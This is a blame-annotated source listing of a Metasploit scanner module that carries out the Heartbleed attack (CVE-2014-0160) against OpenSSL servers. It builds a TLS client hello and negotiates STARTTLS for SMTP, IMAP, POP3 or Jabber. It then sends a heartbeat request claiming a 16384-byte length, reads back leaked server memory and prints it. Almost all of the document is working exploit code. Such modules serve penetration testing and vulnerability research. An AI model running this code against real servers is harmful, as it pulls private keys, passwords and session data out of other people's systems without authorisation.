2014-04-07 19:15:54 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
2014-04-08 19:13:56 +00:00
|
|
|
CIPHER_SUITES = [
|
|
|
|
0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
|
|
|
|
0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
|
|
|
|
0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA
|
|
|
|
0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA
|
|
|
|
0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA
|
|
|
|
0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA
|
|
|
|
0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
|
|
|
|
0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA
|
|
|
|
0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
|
|
|
|
0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
|
|
|
|
0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA
|
|
|
|
0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
|
|
|
|
0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
|
|
|
|
0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
|
|
|
|
0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA
|
|
|
|
0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA
|
|
|
|
0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|
|
|
|
0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA
|
|
|
|
0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
|
|
|
|
0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
|
|
|
|
0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA
|
|
|
|
0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
|
|
|
|
0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
|
|
|
|
0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA
|
|
|
|
0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA
|
|
|
|
0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA
|
|
|
|
0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA
|
|
|
|
0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA
|
|
|
|
0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA
|
|
|
|
0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
|
|
|
|
0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA
|
|
|
|
0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
|
|
|
|
0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
|
|
|
|
0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA
|
|
|
|
0x0096, # TLS_RSA_WITH_SEED_CBC_SHA
|
|
|
|
0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
|
|
|
|
0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA
|
|
|
|
0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
|
|
|
|
0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA
|
|
|
|
0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA
|
|
|
|
0x0005, # TLS_RSA_WITH_RC4_128_SHA
|
|
|
|
0x0004, # TLS_RSA_WITH_RC4_128_MD5
|
|
|
|
0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA
|
|
|
|
0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA
|
|
|
|
0x0009, # TLS_RSA_WITH_DES_CBC_SHA
|
|
|
|
0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|
|
|
|
0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA
|
|
|
|
0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA
|
|
|
|
0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5
|
|
|
|
0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5
|
|
|
|
0x00ff # Unknown
|
|
|
|
]
|
|
|
|
|
|
|
|
HANDSHAKE_RECORD_TYPE = 0x16
|
|
|
|
HEARTBEAT_RECORD_TYPE = 0x18
|
2014-04-09 13:08:24 +00:00
|
|
|
ALERT_RECORD_TYPE = 0x15
|
2014-04-08 21:51:50 +00:00
|
|
|
TLS_VERSION = {
|
|
|
|
'1.0' => 0x0301,
|
|
|
|
'1.1' => 0x0302,
|
|
|
|
'1.2' => 0x0303
|
|
|
|
}
|
2014-04-08 19:13:56 +00:00
|
|
|
|
2014-04-08 20:32:13 +00:00
|
|
|
TTLS_CALLBACKS = {
|
|
|
|
'SMTP' => :tls_smtp,
|
|
|
|
'IMAP' => :tls_imap,
|
|
|
|
'JABBER' => :tls_jabber,
|
|
|
|
'POP3' => :tls_pop3
|
|
|
|
}
|
|
|
|
|
2014-04-07 19:15:54 +00:00
|
|
|
def initialize
|
|
|
|
super(
|
2014-04-09 01:11:28 +00:00
|
|
|
'Name' => 'OpenSSL Heartbeat Information Leak',
|
|
|
|
'Description' => %q{
|
|
|
|
This module implements the OpenSSL Heartbleed attack. The problem
|
|
|
|
exists in the handling of heartbeat requests, where a fake length can
|
|
|
|
be used to leak memory data in the response. Services that support
|
|
|
|
STARTTLS may also be vulnerable.
|
2014-04-08 19:13:56 +00:00
|
|
|
},
|
2014-04-09 01:11:28 +00:00
|
|
|
'Author' => [
|
2014-04-08 20:10:27 +00:00
|
|
|
'Neel Mehta', # Vulnerability discovery
|
|
|
|
'Riku', # Vulnerability discovery
|
|
|
|
'Antti', # Vulnerability discovery
|
|
|
|
'Matti', # Vulnerability discovery
|
|
|
|
'Jared Stafford <jspenguin[at]jspenguin.org>', # Original Proof of Concept. This module is based on it.
|
2014-04-08 19:13:56 +00:00
|
|
|
'FiloSottile', # PoC site and tool
|
2014-04-08 20:10:27 +00:00
|
|
|
'Christian Mehlmauer <FireFart[at]gmail.com>', # Msf module
|
2014-04-09 01:11:28 +00:00
|
|
|
'juan vazquez' # Msf module
|
2014-04-08 19:13:56 +00:00
|
|
|
],
|
2014-04-09 01:11:28 +00:00
|
|
|
'References' =>
|
2014-04-08 19:13:56 +00:00
|
|
|
[
|
2014-04-08 20:56:56 +00:00
|
|
|
['CVE', '2014-0160'],
|
2014-04-08 21:01:06 +00:00
|
|
|
['US-CERT-VU', '720951'],
|
|
|
|
['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A'],
|
2014-04-08 20:56:56 +00:00
|
|
|
['URL', 'http://heartbleed.com/'],
|
|
|
|
['URL', 'https://github.com/FiloSottile/Heartbleed'],
|
|
|
|
['URL', 'https://gist.github.com/takeshixx/10107280'],
|
|
|
|
['URL', 'http://filippo.io/Heartbleed/']
|
2014-04-08 19:13:56 +00:00
|
|
|
],
|
2014-04-09 01:11:28 +00:00
|
|
|
'DisclosureDate' => 'Apr 7 2014',
|
|
|
|
'License' => MSF_LICENSE
|
2014-04-07 19:15:54 +00:00
|
|
|
)
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(443),
|
2014-04-08 21:51:50 +00:00
|
|
|
OptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3' ]]),
|
|
|
|
OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.1', ['1.0', '1.1', '1.2']])
|
2014-04-07 19:15:54 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
2014-04-08 19:13:56 +00:00
|
|
|
def peer
|
|
|
|
"#{rhost}:#{rport}"
|
2014-04-07 19:15:54 +00:00
|
|
|
end
|
|
|
|
|
2014-04-08 19:56:05 +00:00
|
|
|
def tls_smtp
|
2014-04-08 20:13:02 +00:00
|
|
|
# https://tools.ietf.org/html/rfc3207
|
2014-04-08 19:13:56 +00:00
|
|
|
sock.get_once
|
2014-04-08 20:32:13 +00:00
|
|
|
sock.put("EHLO #{Rex::Text.rand_text_alpha(10)}\n")
|
2014-04-08 19:13:56 +00:00
|
|
|
res = sock.get_once
|
2014-04-08 20:18:38 +00:00
|
|
|
|
2014-04-08 20:10:27 +00:00
|
|
|
unless res && res =~ /STARTTLS/
|
2014-04-08 19:13:56 +00:00
|
|
|
return nil
|
|
|
|
end
|
|
|
|
sock.put("STARTTLS\n")
|
|
|
|
sock.get_once
|
2014-04-07 19:15:54 +00:00
|
|
|
end
|
|
|
|
|
2014-04-08 19:56:05 +00:00
|
|
|
def tls_imap
|
2014-04-08 20:13:02 +00:00
|
|
|
# http://tools.ietf.org/html/rfc2595
|
2014-04-08 19:56:05 +00:00
|
|
|
sock.get_once
|
|
|
|
sock.put("a001 CAPABILITY\r\n")
|
|
|
|
res = sock.get_once
|
2014-04-08 23:21:09 +00:00
|
|
|
unless res && res =~ /STARTTLS/i
|
2014-04-08 19:56:05 +00:00
|
|
|
return nil
|
|
|
|
end
|
|
|
|
sock.put("a002 STARTTLS\r\n")
|
|
|
|
sock.get_once
|
|
|
|
end
|
|
|
|
|
|
|
|
def tls_pop3
|
2014-04-08 20:13:02 +00:00
|
|
|
# http://tools.ietf.org/html/rfc2595
|
2014-04-08 19:56:05 +00:00
|
|
|
sock.get_once
|
|
|
|
sock.put("CAPA\r\n")
|
|
|
|
res = sock.get_once
|
2014-04-08 23:21:09 +00:00
|
|
|
if res.nil? || res =~ /^-/
|
2014-04-08 19:56:05 +00:00
|
|
|
return nil
|
|
|
|
end
|
|
|
|
sock.put("STLS\r\n")
|
|
|
|
res = sock.get_once
|
2014-04-08 23:21:49 +00:00
|
|
|
if res.nil? || res =~ /^-/
|
2014-04-08 19:56:05 +00:00
|
|
|
return nil
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def tls_jabber
|
2014-04-08 20:13:02 +00:00
|
|
|
# http://xmpp.org/extensions/xep-0035.html
|
|
|
|
msg = "<?xml version='1.0' ?>"
|
|
|
|
msg << "<stream:stream xmlns='jabber:client' "
|
|
|
|
msg << "xmlns:stream='http://etherx.jabber.org/streams' "
|
|
|
|
msg << "xmlns:tls='http://www.ietf.org/rfc/rfc2595.txt' "
|
|
|
|
msg << "to='#{rhost}'>"
|
2014-04-08 19:56:05 +00:00
|
|
|
sock.put(msg)
|
|
|
|
res = sock.get_once
|
|
|
|
return nil if res.nil? # SSL not supported
|
2014-04-08 23:21:09 +00:00
|
|
|
return nil if res =~ /stream:error/ || res !~ /starttls/i
|
2014-04-08 19:56:05 +00:00
|
|
|
msg = "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
|
|
|
|
sock.put(msg)
|
|
|
|
sock.get_once
|
|
|
|
end
|
|
|
|
|
2014-04-08 19:13:56 +00:00
|
|
|
def run_host(ip)
|
2014-04-07 19:15:54 +00:00
|
|
|
connect
|
2014-04-08 19:13:56 +00:00
|
|
|
|
2014-04-08 20:32:13 +00:00
|
|
|
unless datastore['STARTTLS'] == 'None'
|
2014-04-08 21:03:38 +00:00
|
|
|
vprint_status("#{peer} - Trying to start SSL via #{datastore['STARTTLS']}")
|
2014-04-08 20:32:13 +00:00
|
|
|
res = self.send(TTLS_CALLBACKS[datastore['STARTTLS']])
|
|
|
|
if res.nil?
|
2014-04-08 21:03:38 +00:00
|
|
|
vprint_error("#{peer} - STARTTLS failed...")
|
2014-04-08 19:13:56 +00:00
|
|
|
return
|
2014-04-08 20:32:13 +00:00
|
|
|
end
|
2014-04-08 19:13:56 +00:00
|
|
|
end
|
|
|
|
|
2014-04-08 21:03:38 +00:00
|
|
|
vprint_status("#{peer} - Sending Client Hello...")
|
2014-04-08 19:13:56 +00:00
|
|
|
sock.put(client_hello)
|
|
|
|
|
2014-04-07 19:15:54 +00:00
|
|
|
server_hello = sock.get
|
2014-04-08 19:13:56 +00:00
|
|
|
unless server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE
|
2014-04-08 21:03:38 +00:00
|
|
|
vprint_error("#{peer} - Server Hello Not Found")
|
2014-04-08 19:13:56 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2014-04-08 21:03:38 +00:00
|
|
|
vprint_status("#{peer} - Sending Heartbeat...")
|
2014-04-08 21:33:05 +00:00
|
|
|
heartbeat_length = 16384
|
|
|
|
sock.put(heartbeat(heartbeat_length))
|
2014-04-07 19:15:54 +00:00
|
|
|
hdr = sock.get_once(5)
|
2014-04-08 19:13:56 +00:00
|
|
|
if hdr.blank?
|
2014-04-08 21:03:38 +00:00
|
|
|
vprint_error("#{peer} - No Heartbeat response...")
|
2014-04-08 19:13:56 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2014-04-09 13:08:24 +00:00
|
|
|
unpacked = hdr.unpack('Cnn')
|
2014-04-07 19:15:54 +00:00
|
|
|
type = unpacked[0]
|
2014-04-08 19:13:56 +00:00
|
|
|
version = unpacked[1] # must match the type from client_hello
|
2014-04-07 19:15:54 +00:00
|
|
|
len = unpacked[2]
|
2014-04-08 19:13:56 +00:00
|
|
|
|
2014-04-09 13:08:24 +00:00
|
|
|
# try to get the TLS error
|
|
|
|
if type == ALERT_RECORD_TYPE
|
|
|
|
res = sock.get_once(len)
|
|
|
|
alert_unp = res.unpack('CC')
|
|
|
|
alert_level = alert_unp[0]
|
|
|
|
alert_desc = alert_unp[1]
|
|
|
|
msg = "Unknown error"
|
|
|
|
case alert_desc
|
|
|
|
when 0x46
|
|
|
|
msg = "Protocol error. Looks like the chosen protocol is not supported."
|
|
|
|
end
|
|
|
|
print_error("#{peer} - #{msg}")
|
|
|
|
disconnect
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2014-04-08 21:51:50 +00:00
|
|
|
unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[datastore['TLSVERSION']]
|
2014-04-09 08:22:15 +00:00
|
|
|
vprint_error("#{peer} - Unexpected Heartbeat response")
|
2014-04-08 19:13:56 +00:00
|
|
|
disconnect
|
|
|
|
return
|
2014-04-07 19:15:54 +00:00
|
|
|
end
|
2014-04-08 19:13:56 +00:00
|
|
|
|
2014-04-08 21:03:38 +00:00
|
|
|
vprint_status("#{peer} - Heartbeat response, checking if there is data leaked...")
|
2014-04-08 21:33:05 +00:00
|
|
|
heartbeat_data = sock.get_once(heartbeat_length) # Read the magic length...
|
2014-04-09 13:08:24 +00:00
|
|
|
if heartbeat_data
|
2014-04-08 21:03:38 +00:00
|
|
|
print_good("#{peer} - Heartbeat response with leak")
|
2014-04-08 19:13:56 +00:00
|
|
|
report_vuln({
|
|
|
|
:host => rhost,
|
|
|
|
:port => rport,
|
|
|
|
:name => self.name,
|
|
|
|
:refs => self.references,
|
|
|
|
:info => "Module #{self.fullname} successfully leaked info"
|
|
|
|
})
|
2014-04-08 20:52:39 +00:00
|
|
|
vprint_status("#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}")
|
2014-04-08 19:13:56 +00:00
|
|
|
else
|
2014-04-08 21:03:38 +00:00
|
|
|
vprint_error("#{peer} - Looks like there isn't leaked information...")
|
2014-04-08 19:13:56 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2014-04-08 21:33:05 +00:00
|
|
|
def heartbeat(length)
|
2014-04-09 07:19:05 +00:00
|
|
|
payload = "\x01" # Heartbeat Message Type: Request (1)
|
|
|
|
payload << [length].pack("n") # Payload Length: 16384
|
2014-04-08 19:13:56 +00:00
|
|
|
|
|
|
|
ssl_record(HEARTBEAT_RECORD_TYPE, payload)
|
|
|
|
end
|
|
|
|
|
|
|
|
def client_hello
|
2014-04-09 07:19:05 +00:00
|
|
|
# Use current day for TLS time
|
|
|
|
time_temp = Time.now
|
|
|
|
time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i
|
|
|
|
|
2014-04-08 21:55:08 +00:00
|
|
|
hello_data = [TLS_VERSION[datastore['TLSVERSION']]].pack("n") # Version TLS
|
2014-04-09 07:19:05 +00:00
|
|
|
hello_data << [time_epoch].pack("N") # Time in epoch format
|
|
|
|
hello_data << Rex::Text.rand_text(28) # Random
|
|
|
|
hello_data << "\x00" # Session ID length
|
2014-04-08 20:52:39 +00:00
|
|
|
hello_data << [CIPHER_SUITES.length * 2].pack("n") # Cipher Suites length (102)
|
2014-04-09 07:19:05 +00:00
|
|
|
hello_data << CIPHER_SUITES.pack("n*") # Cipher Suites
|
|
|
|
hello_data << "\x01" # Compression methods length (1)
|
|
|
|
hello_data << "\x00" # Compression methods: null
|
2014-04-08 21:21:38 +00:00
|
|
|
|
2014-04-09 07:19:05 +00:00
|
|
|
hello_data_extensions = "\x00\x0f" # Extension type (Heartbeat)
|
|
|
|
hello_data_extensions << "\x00\x01" # Extension length
|
|
|
|
hello_data_extensions << "\x01" # Extension data
|
2014-04-08 21:21:38 +00:00
|
|
|
|
2014-04-08 21:29:31 +00:00
|
|
|
hello_data << [hello_data_extensions.length].pack("n")
|
2014-04-08 21:21:38 +00:00
|
|
|
hello_data << hello_data_extensions
|
2014-04-08 20:52:39 +00:00
|
|
|
|
|
|
|
data = "\x01\x00" # Handshake Type: Client Hello (1)
|
2014-04-08 21:04:38 +00:00
|
|
|
data << [hello_data.length].pack("n") # Length
|
2014-04-08 20:52:39 +00:00
|
|
|
data << hello_data
|
2014-04-08 19:13:56 +00:00
|
|
|
|
|
|
|
ssl_record(HANDSHAKE_RECORD_TYPE, data)
|
2014-04-07 19:15:54 +00:00
|
|
|
end
|
|
|
|
|
2014-04-08 19:13:56 +00:00
|
|
|
def ssl_record(type, data)
|
2014-04-08 21:51:50 +00:00
|
|
|
record = [type, TLS_VERSION[datastore['TLSVERSION']], data.length].pack('Cnn')
|
2014-04-08 19:13:56 +00:00
|
|
|
record << data
|
|
|
|
end
|
2014-04-07 19:15:54 +00:00
|
|
|
end
|